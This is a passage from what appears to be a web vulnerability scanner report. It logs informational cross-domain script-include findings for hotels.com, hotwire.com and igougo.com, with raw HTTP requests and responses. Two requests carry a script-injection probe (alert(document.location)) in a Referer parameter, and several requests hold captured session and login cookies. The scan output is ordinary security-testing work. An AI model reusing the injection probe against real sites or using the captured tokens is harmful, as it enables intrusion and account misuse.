Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotels&grp=9702&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B222113440%3B45762978%3Bg%3Fhttp%3A%2F%2Fwww.hotels.com%2FPPCSearch%3Fcity%3D%24%7Bcity%7D%2C%24%7Bstate%7D%26arrivalDate%3D%24%7BdepartureDate%3Ad%3A%22dd%2Fmm%2Fyyyy%22%7D%26adultsPerRoom%3D2%26numberOfRooms%3D%24%7Brooms%7D%26departureDate%3D%24%7BreturnDate%3Ad%3A%22dd%2Fmm%2Fyyyy%22%7D%26PSRC%3DIGOUGO%26rffrid%3Dmdp.hcom.US.138.160.02&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=150&pos=3&aii=2fc59ddf-790d-4415-832a-eafa2c6a46cb&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; user=QSplbl9VU3xIQ09NX1VT

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:10:04 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=ZgAAAAAAAAAAAAAAAAAAAAAAAAYAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:10:04 GMT
Set-Cookie: mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:04 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:10:04 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMTo5Ny43My4xLmkzOjk4LjYuNDoxMzcuMC4wLmkyOjE0NS4wLjAuaTI6MTA4LjEuMC5pMjoxNTIuMC4wLmkyOjIuMi4xOjE5Ni4xLjA6OTIuMC4wLmkxOjEzMi4yLjAuaTI6MTIxLjUwMy4wLmk3OjEzOC4xLjA6MTk1LjAuMDoxMDQuMC4xfEhDT01fVVM.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:04 GMT; Path=/
Content-Length: 368925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<td width="135" align="right" valign="top">
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.hotels.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js" async="true"></script>
...[SNIP]...
20.64. http://www.hotels.com/search/search.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /search/search.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search/search.html?cd=10-14-11&dd=10-16-11&hid=205543&nr=1&pn=1&r=2&rl=destination%3A1401516%3APROVIDED%3APROVIDED&vt=LIST HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; SSLB=1; SSPV=PfwAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAA; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A130.1.1.i2%3A103.4.1.i6%3A171.1.0%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//"; user=RCoxODUuMC4wLmkxOjExNC4xLjA6MTI0LjEuMC5pMToxMzAuMS4xLmkyOjEwMy40LjEuaTY6MTcxLjEuMDo0OC4xLjA6OTcuNzMuMS5pMzo5OC42LjQ6MTQyLjAuMC5pNDoxOTguMi4wOjE0NS4wLjAuaTI6MjAwLjAuMDoxMzcuMC4wLmkyOjEwOC4xLjAuaTI6MTkwLjMuMDoxNTIuMC4wLmkyOjEzNC4wLjE6MTk2LjEuMDoyLjIuMToyMDkuMC4xOjE0Ny42LjAuaTY6OTIuMC4wLmkxOjEyMS41MDMuMC5pNzoxMzIuMi4wLmkyOjEyMi4xLjAuaTM6MTM4LjEuMDoxNDkuMC4wLmkxOjEwNC4wLjE6MTk1LjAuMHxIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDIhRio.

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 01:02:34 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=DvwAAAAAAAEAAAAAAAAAAAAAAAMAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 01:02:34 GMT
Set-Cookie: mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A84.0.0.i2%3A98.6.4%3A142.0.0.i4%3A119.0.2.i2%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A78.0.1%3A147.0.1.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A184.0.0.i1%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:34 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//1401516"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 01:02:34 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTg1LjAuMC5pMToxMTQuMS4wOjEyNC4xLjAuaTE6MTAzLjQuMS5pNjoxNzEuMS4wOjEzMC4xLjEuaTI6NDguMS4wOjk3LjczLjEuaTM6ODQuMC4wLmkyOjk4LjYuNDoxNDIuMC4wLmk0OjExOS4wLjIuaTI6MTk4LjIuMDoxNDUuMC4wLmkyOjIwMC4wLjA6MTM3LjAuMC5pMjoxMDguMS4wLmkyOjE5MC4zLjA6MTUyLjAuMC5pMjoxMzQuMC4xOjE5Ni4xLjA6Mi4yLjE6MjA5LjAuMTo3OC4wLjE6MTQ3LjAuMS5pNjo5Mi4wLjAuaTE6MTIxLjUwMy4wLmk3OjEzMi4yLjAuaTI6MTg0LjAuMC5pMToxMjIuMS4wLmkzOjEzOC4xLjA6MTQ5LjAuMC5pMToxMDQuMC4xOjE5NS4wLjB8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDI.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:34 GMT; Path=/
Content-Length: 371034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<td width="135" align="right" valign="top">
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.hotels.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js" async="true"></script>
...[SNIP]...
20.65. http://www.hotwire.com/hotel/details.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotwire.com
Path:   /hotel/details.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665 HTTP/1.1
Host: www.hotwire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=974DB21E0DA548F45875D88836CCB561; SaneID=974DB21E0DA548F45875D88836CCB56; NSC_qspe-xxx-qfstjtu=ffffffffaf131c8e45525d5f4f58455e445a4a422d6f; hwAnalytics_previousPageName=hotel.results; gsc=1; hotwireLogin=V4XFi9mFuQsCCPy6V/qhrdIccYJFHrJxloNL+OGc4tZkfjnIHGhTi7ltrG1IPXfIeO+uyJQdNdBMLRhhG2FHTMgXg79d4ve0wj4co6fHPBw/6XrC+I2V0VAJjgDrxtP6UCZQAzRZKNmqg6s3BNNiMzoqSlE+9QLVq8LlP5r5sVC9LqYt6r1WejbBqGtX4/QeMydTsx5XDmME0qOPB8zW5aGoplccEyUVyAQw1zoB77fdKkw2wifeN3QXc3uxCTtpmp1Xbz0DxcS4cKS1iGZ7tDS9ulFNeBvx/qJTKhJwy7rJEih5XSyT1Fco8d5rZFOYJfrLMMzpj5kMJEILR9qBNRDl+42pRMtKzavwDRm7Zn4S+YVpyXk9PjDFsc8boH4pNL/i/1SO3SnXZq06Bmb1cMu94wvBIzddV6cWSVnTSkb6zEWjyhKcj/R/L14UAfRNxKLA1dwarM4dx9zfvTJdnTQ5OD8cXu1QsRQx6bhBdHgkaVvI7Yv0CzgZubBDGYZ2py/gVN6nUboAKdWWhnH1+SCb4zGbUyOIkF4m3Q5L+mHwtRpnviW5iB6TzG4qM3vCGJzuO/q61vTeJmSjVVzx75u8crr6cftWqHj6w1ad2e3Pf5CFEtJtPeidw2FziNaUnrZUO8Dg4khW7hU9cY7J7fKZ4GRKCUFiaqRBwocDhg2nL+BU3qdRuu3nLjE0iKGkecN3QDSwuy2hpe08Csu2fupUbvdFv0Cs+iPYTYOKXR36I9hNg4pdHfoj2E2Dil0d+iPYTYOKXR36I9hNg4pdHZkXMwFjN5//l477VJL34Ji0R3huVJCIXPoj2E2Dil0d+iPYTYOKXR0HbQ0daheJbt99vtzXseEa+iPYTYOKXR1PInMvNwnP4qWAQ5Fqf/sURmHo2YOoPtSM+3JgIIVvgfoj2E2Dil0dfPSXg9UVFkdonRAnD1CzZSScdfGLoqChRdyjkfXmqOcml0c5X6k8GJajsUKRNqS+Ouz/Wdyu4BraAnioKq60T2Ii7hTLeddfkVbI7P1I/pc=; hotwirePageModuleState=pgoodCode=H&searchTokenId=1; s_cpm=%5B%5B'sid%253AS250%252Cbid%253AB260711'%2C'1317602289069'%5D%5D; s_vi=[CS]v1|274481F985012F24-6000010920164B07[CE]; quoter_buyer=HQ; s_cc=true; s_sq=%5B%5BB%5D%5D; hwAnalytics_lid=hotel.results.opaque%3Abooking-nav%3Acontinue; hwAnalytics_crossPageVariables=%7B%22prop61%22%3A%22social-proof-m%22%2C%22eVar41%22%3A%222%22%2C%22eVar34%22%3A%22FLU01-01%22%7D; s_nr=1317603699724

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-control: no-store, no-cache, private, must-revalidate
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 01:01:43 GMT
Content-Length: 131060


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<meta http-equiv="Content-Language" content="en-us"/>
<meta http-equ
...[SNIP]...
</script>


<script src="http://ak-static.hotwirestatic.com/static/deploy/master/hwCore.js?ver=219395"></script>
...[SNIP]...
20.66. http://www.hotwire.com/hotel/results.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotwire.com
Path:   /hotel/results.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hotel/results.jsp?searchTokenId=1 HTTP/1.1
Host: www.hotwire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=974DB21E0DA548F45875D88836CCB561; SaneID=974DB21E0DA548F45875D88836CCB56; hotwireLogin=V4XFi9mFuQsCCPy6V/qhrdIccYJFHrJxloNL+OGc4tZkfjnIHGhTi7ltrG1IPXfIeO+uyJQdNdBMLRhhG2FHTMgXg79d4ve0wj4co6fHPBw/6XrC+I2V0VAJjgDrxtP6UCZQAzRZKNmqg6s3BNNiMzoqSlE+9QLVq8LlP5r5sVC9LqYt6r1WejbBqGtX4/QeMydTsx5XDmME0qOPB8zW5aGoplccEyUVyAQw1zoB77fdKkw2wifeN3QXc3uxCTtpmp1Xbz0DxcS4cKS1iGZ7tDS9ulFNeBvx/qJTKhJwy7rJEih5XSyT1Fco8d5rZFOYJfrLMMzpj5kMJEILR9qBNRDl+42pRMtKzavwDRm7Zn4S+YVpyXk9PjDFsc8boH4pNL/i/1SO3SnXZq06Bmb1cMu94wvBIzddV6cWSVnTSkb6zEWjyhKcj/R/L14UAfRNxKLA1dwarM4dx9zfvTJdnTQ5OD8cXu1QsRQx6bhBdHgkaVvI7Yv0CzgZubBDGYZ2py/gVN6nUboAKdWWhnH1+SCb4zGbUyOIkF4m3Q5L+mHwtRpnviW5iB6TzG4qM3vCGJzuO/q61vTeJmSjVVzx75u8crr6cftWqHj6w1ad2e3Pf5CFEtJtPeidw2FziNaUnrZUO8Dg4khW7hU9cY7J7fKZ4GRKCUFiaqRBwocDhg2nL+BU3qdRuu3nLjE0iKGkecN3QDSwuy2hpe08Csu2fupUbvdFv0Cs+iPYTYOKXR36I9hNg4pdHfoj2E2Dil0d+iPYTYOKXR36I9hNg4pdHZkXMwFjN5//GfFEXccZLnQ9cx0NaloS+foj2E2Dil0d+iPYTYOKXR0HbQ0daheJbt99vtzXseEa+iPYTYOKXR1PInMvNwnP4qWAQ5Fqf/sURmHo2YOoPtSM+3JgIIVvgfoj2E2Dil0dfPSXg9UVFkdonRAnD1CzZSScdfGLoqChRdyjkfXmqOcml0c5X6k8GJajsUKRNqS+Ouz/Wdyu4BraAnioKq60T2Ii7hTLeddfkVbI7P1I/pc=; auth=true; NSC_qspe-xxx-qfstjtu=ffffffffaf131c8e45525d5f4f58455e445a4a422d6f

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-control: no-store, no-cache, private, must-revalidate
Set-Cookie: gsc=3; Expires=Mon, 03-Oct-2011 06:59:59 GMT; Path=/
Set-Cookie: hotwireLogin=V4XFi9mFuQsCCPy6V/qhrdIccYJFHrJxloNL+OGc4tZkfjnIHGhTi7ltrG1IPXfIeO+uyJQdNdBMLRhhG2FHTMgXg79d4ve0wj4co6fHPBw/6XrC+I2V0VAJjgDrxtP6UCZQAzRZKNmqg6s3BNNiMzoqSlE+9QLVq8LlP5r5sVC9LqYt6r1WejbBqGtX4/QeMydTsx5XDmME0qOPB8zW5aGoplccEyUVyAQw1zoB77fdKkw2wifeN3QXc3uxCTtpmp1Xbz0DxcS4cKS1iGZ7tDS9ulFNeBvx/qJTKhJwy7rJEih5XSyT1Fco8d5rZFOYJfrLMMzpj5kMJEILR9qBNRDl+42pRMtKzavwDRm7Zn4S+YVpyXk9PjDFsc8boH4pNL/i/1SO3SnXZq06Bmb1cMu94wvBIzddV6cWSVnTSkb6zEWjyhKcj/R/L14UAfRNxKLA1dwarM4dx9zfvTJdnTQ5OD8cXu1QsRQx6bhBdHgkaVvI7Yv0CzgZubBDGYZ2py/gVN6nUboAKdWWhnH1+SCb4zGbUyOIkF4m3Q5L+mHwtRpnviW5iB6TzG4qM3vCGJzuO/q61vTeJmSjVVzx75u8crr6cftWqHj6w1ad2e3Pf5CFEtJtPeidw2FziNaUnrZUO8Dg4khW7hU9cY7J7fKZ4GRKCUFiaqRBwocDhg2nL+BU3qdRuu3nLjE0iKGkecN3QDSwuy2hpe08Csu2fupUbvdFv0Cs+iPYTYOKXR36I9hNg4pdHfoj2E2Dil0d+iPYTYOKXR36I9hNg4pdHZkXMwFjN5//l477VJL34JgBIItf8EEvK/oj2E2Dil0d+iPYTYOKXR0HbQ0daheJbt99vtzXseEa+iPYTYOKXR1PInMvNwnP4qWAQ5Fqf/sURmHo2YOoPtSM+3JgIIVvgfoj2E2Dil0dfPSXg9UVFkdonRAnD1CzZSScdfGLoqChRdyjkfXmqOcml0c5X6k8GJajsUKRNqS+Ouz/Wdyu4BraAnioKq60T2Ii7hTLeddfkVbI7P1I/pc=; Expires=Tue, 02-Oct-2012 00:38:25 GMT; Path=/
Set-Cookie: hotwirePageModuleState=pgoodCode=H&searchTokenId=1; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:38:24 GMT
Content-Length: 288536


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<meta http-equiv="Content-Language" content="en-us"/>
<meta http-equ
...[SNIP]...
</script>


<script src="http://ak-static.hotwirestatic.com/static/deploy/master/hwCore.js?ver=219395"></script>
...[SNIP]...
<link rel="stylesheet" href="http://ak-static.hotwirestatic.com/static/deploy/css/hotel/results/hotelResultsPrint.css?ver=209738" media="print" type="text/css"/>


<script type="text/javascript" src="http://ak-static.hotwirestatic.com/static/deploy/??javascript/core/HwStateSupport.js,javascript/hotel/SidebarFilterComp.js,ver=182672"></script>
...[SNIP]...
</div>


<script type="text/javascript" src="http://ak-static.hotwirestatic.com/static/deploy/javascript/core/HwValidatorSupport.js?ver=177334"></script>
...[SNIP]...
20.67. http://www.igougo.com/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196413115781250 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Bostond123a'%3balert(document.location)//08fa278eb24&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-3; mbox=session#1317601622475-177474#1317604892|PC#1317601622475-177474.19#1318812632|check#true#1317603092; __utma=179047228.1875149061.1317601642.1317601642.1317603064.1; __utmb=179047228.2.10.1317601644; __utmc=179047228; __utmz=179047228.1317601644.1.1.utmcsr=travelocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/popWindow2; SAVId=vid%3Dx1w62AsKbKCFg85jBBCxmj34ktjbYQjD%3Bnvid%3D1%3Bcvid%3D0%3Bpdx%3D24%3Bgdx%3D0%3Bplen%3D24%3Bpid%3D4257dc4c10e6095c8b4692e01f48b912d%3Bpt%3D0%3B; ASP.NET_SessionId=vxlwukrxaiv2ngqs5gwhjc55; UUIDCookie=bf5d4206cc2e4f92b1371f395729999f; SL_Audience=674|Accelerated|285|12|0; SL_UVId=2BC47F12FA5D4186; SL_NV12=1|12

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 01:00:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36807


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="jPFyPOMFqOIyySa1Ijk47BJFS78c8e34J/QbTBG6D+LxhAxUsjypMF6hiFDTpoMbcfo9sE57OmQ9GgbZpzfvNckFyhKdrmHnA0uwRcf2yHhSGoL+1kOWQ6RHFhI=" />


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=798742402634531860109256513&adsize=728x90&pagepos=1&random=634531860109256513?" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=798742402634531860109256513&adsize=728x90&pagepos=2&random=634531860109412760?" type="text/javascript"></script>
...[SNIP]...
20.68. http://www.igougo.com/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196413115781250 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Bostond123a'%3balert(document.location)//08fa278eb24&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=179047228.1875149061.1317601642.1317601642.1317601642.1; __utmb=179047228.1.10.1317601644; __utmz=179047228.1317601644.1.1.utmcsr=travelocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/popWindow2; SAVId=vid%3Dx1w62AsKbKCFg85jBBCxmj34ktjbYQjD%3Bnvid%3D1%3Bcvid%3D0%3Bpdx%3D24%3Bgdx%3D0%3Bplen%3D24%3Bpid%3D4257dc4c10e6095c8b4692e01f48b912d%3Bpt%3D125%3B; __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-2; mbox=session#1317601622475-177474#1317604709|PC#1317601622475-177474.19#1318812449|check#true#1317602909; ASP.NET_SessionId=vxlwukrxaiv2ngqs5gwhjc55; UUIDCookie=bf5d4206cc2e4f92b1371f395729999f; SL_Audience=674|Accelerated|285|12|0; SL_UVId=2BC47F12FA5D4186; SL_NV12=1|12

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:52:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36807


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="B9TPERwQcR+D/nBPJDRqBKD1IcNELB0s1zPw+XALdvHgPFTe4T0RRGzh0YSgIuK78WpCRw48jXCy7RKSJLmMTPuuebMaFQABqNR5D8K4959K3DUL1p0gQOIzC9k=" />


